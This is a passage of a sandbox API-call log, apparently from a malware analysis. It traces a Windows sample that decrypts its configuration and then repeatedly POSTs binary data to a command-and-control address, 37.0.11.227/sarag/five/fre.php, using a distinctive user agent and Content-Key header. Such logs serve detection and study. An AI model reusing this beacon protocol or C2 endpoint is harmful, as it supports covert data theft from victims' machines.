buf=0x6ad508*, len=242, flags=0) returned 242 [0221.887] send (s=0x570, buf=0x6aba40*, len=159, flags=0) returned 159 [0221.888] GetProcessHeap () returned 0x690000 [0221.888] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0221.888] recv (in: s=0x570, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0221.957] GetProcessHeap () returned 0x690000 [0221.957] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0221.957] GetProcessHeap () returned 0x690000 [0221.958] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0221.958] GetProcessHeap () returned 0x690000 [0221.958] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0221.959] GetProcessHeap () returned 0x690000 [0221.959] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0221.959] closesocket (s=0x570) returned 0 [0221.960] GetProcessHeap () returned 0x690000 [0221.960] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0221.962] GetProcessHeap () returned 0x690000 [0221.963] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0221.963] GetProcessHeap () returned 0x690000 [0221.963] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0221.963] GetProcessHeap () returned 0x690000 [0221.963] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0221.963] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xffc) returned 0x570 [0221.965] Sleep (dwMilliseconds=0xea60) [0221.967] GetProcessHeap () returned 0x690000 [0221.967] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0221.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.968] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0221.974] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.975] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0221.981] GetProcessHeap () returned 0x690000 [0221.985] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0221.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.986] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0221.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.987] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0221.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.989] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.989] GetProcessHeap () returned 0x690000 [0221.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0221.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.990] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0221.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.991] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0221.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0221.995] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0221.995] GetProcessHeap () returned 0x690000 [0221.995] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0221.996] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.996] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0221.997] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0221.997] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0222.002] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.002] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0222.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.006] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0222.006] GetProcessHeap () returned 0x690000 [0222.006] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0222.006] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0222.006] GetProcessHeap () returned 0x690000 [0222.007] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0222.007] GetProcessHeap () returned 0x690000 [0222.007] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0222.007] GetProcessHeap () returned 0x690000 [0222.008] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0222.008] GetProcessHeap () returned 0x690000 [0222.008] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0222.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.009] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0222.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.014] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0222.022] GetProcessHeap () returned 0x690000 [0222.022] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0222.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.024] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0222.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.025] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0222.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.028] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.028] GetProcessHeap () returned 0x690000 [0222.029] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0222.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.030] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0222.031] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.031] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0222.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.033] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0222.033] GetProcessHeap () returned 0x690000 [0222.033] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0222.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.034] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0222.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.036] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0222.036] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.039] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0222.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.040] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0222.040] GetProcessHeap () returned 0x690000 [0222.040] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0222.040] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0222.040] GetProcessHeap () returned 0x690000 [0222.040] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0222.040] socket (af=2, type=1, protocol=6) returned 0x574 [0222.041] connect (s=0x574, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0222.144] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0222.144] GetProcessHeap () returned 0x690000 [0222.144] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0222.144] GetProcessHeap () returned 0x690000 [0222.144] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0222.145] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0222.146] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0222.146] GetProcessHeap () returned 0x690000 [0222.146] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af800 [0222.146] GetProcessHeap () returned 0x690000 [0222.146] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0222.146] GetProcessHeap () returned 0x690000 [0222.146] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0222.147] GetProcessHeap () returned 0x690000 [0222.147] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0222.147] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0222.148] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0222.148] GetProcessHeap () returned 0x690000 [0222.148] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0222.148] GetProcessHeap () returned 0x690000 [0222.149] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0222.149] send (s=0x574, buf=0x6ab500*, len=242, flags=0) returned 242 [0222.152] send (s=0x574, buf=0x6aba40*, len=159, flags=0) returned 159 [0222.152] GetProcessHeap () returned 0x690000 [0222.152] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0222.152] recv (in: s=0x574, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0222.224] GetProcessHeap () returned 0x690000 [0222.224] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0222.224] GetProcessHeap () returned 0x690000 [0222.225] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0222.225] GetProcessHeap () returned 0x690000 [0222.225] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af800 | out: hHeap=0x690000) returned 1 [0222.225] GetProcessHeap () returned 0x690000 [0222.225] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0222.225] closesocket (s=0x574) returned 0 [0222.226] GetProcessHeap () returned 0x690000 [0222.226] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0222.226] GetProcessHeap () returned 0x690000 [0222.226] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0222.226] GetProcessHeap () returned 0x690000 [0222.227] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0222.227] GetProcessHeap () returned 0x690000 [0222.228] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0222.230] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x510) returned 0x574 [0222.231] Sleep (dwMilliseconds=0xea60) [0222.233] GetProcessHeap () returned 0x690000 [0222.233] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0222.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.234] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0222.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.241] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0222.247] GetProcessHeap () returned 0x690000 [0222.247] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0222.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.248] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0222.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.250] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0222.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.253] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.253] GetProcessHeap () returned 0x690000 [0222.253] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0222.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.254] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0222.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.255] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0222.256] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.256] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0222.256] GetProcessHeap () returned 0x690000 [0222.256] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0222.257] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.257] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0222.258] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.258] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0222.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.259] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0222.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.260] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0222.260] GetProcessHeap () returned 0x690000 [0222.260] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0222.260] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0222.260] GetProcessHeap () returned 0x690000 [0222.261] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0222.265] GetProcessHeap () returned 0x690000 [0222.266] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0222.266] GetProcessHeap () returned 0x690000 [0222.266] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0222.266] GetProcessHeap () returned 0x690000 [0222.266] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0222.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.267] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0222.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.274] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0222.280] GetProcessHeap () returned 0x690000 [0222.280] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0222.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.281] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0222.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.282] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0222.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.283] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.283] GetProcessHeap () returned 0x690000 [0222.283] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0222.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.284] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0222.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.285] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0222.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0222.286] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0222.286] GetProcessHeap () returned 0x690000 [0222.286] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0222.287] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.287] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0222.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.288] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0222.289] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.289] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0222.290] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0222.290] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0222.291] GetProcessHeap () returned 0x690000 [0222.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0222.291] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0222.291] GetProcessHeap () returned 0x690000 [0222.291] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0222.291] socket (af=2, type=1, protocol=6) returned 0x578 [0222.291] connect (s=0x578, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0222.319] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0222.319] GetProcessHeap () returned 0x690000 [0222.319] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0222.319] GetProcessHeap () returned 0x690000 [0222.319] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0222.320] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0222.321] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0222.321] GetProcessHeap () returned 0x690000 [0222.321] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0222.321] GetProcessHeap () returned 0x690000 [0222.321] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0222.321] GetProcessHeap () returned 0x690000 [0222.321] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0222.322] GetProcessHeap () returned 0x690000 [0222.322] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0222.322] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0222.323] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0222.323] GetProcessHeap () returned 0x690000 [0222.323] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0222.323] GetProcessHeap () returned 0x690000 [0222.324] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0222.324] send (s=0x578, buf=0x6ad508*, len=242, flags=0) returned 242 [0222.324] send (s=0x578, buf=0x6aba40*, len=159, flags=0) returned 159 [0222.325] GetProcessHeap () returned 0x690000 [0222.325] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0222.325] recv (in: s=0x578, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0222.393] GetProcessHeap () returned 0x690000 [0222.393] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0222.393] GetProcessHeap () returned 0x690000 [0222.394] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0222.397] GetProcessHeap () returned 0x690000 [0222.397] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0222.397] GetProcessHeap () returned 0x690000 [0222.397] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0222.398] closesocket (s=0x578) returned 0 [0222.398] GetProcessHeap () returned 0x690000 [0222.398] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0222.398] GetProcessHeap () returned 0x690000 [0222.398] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: 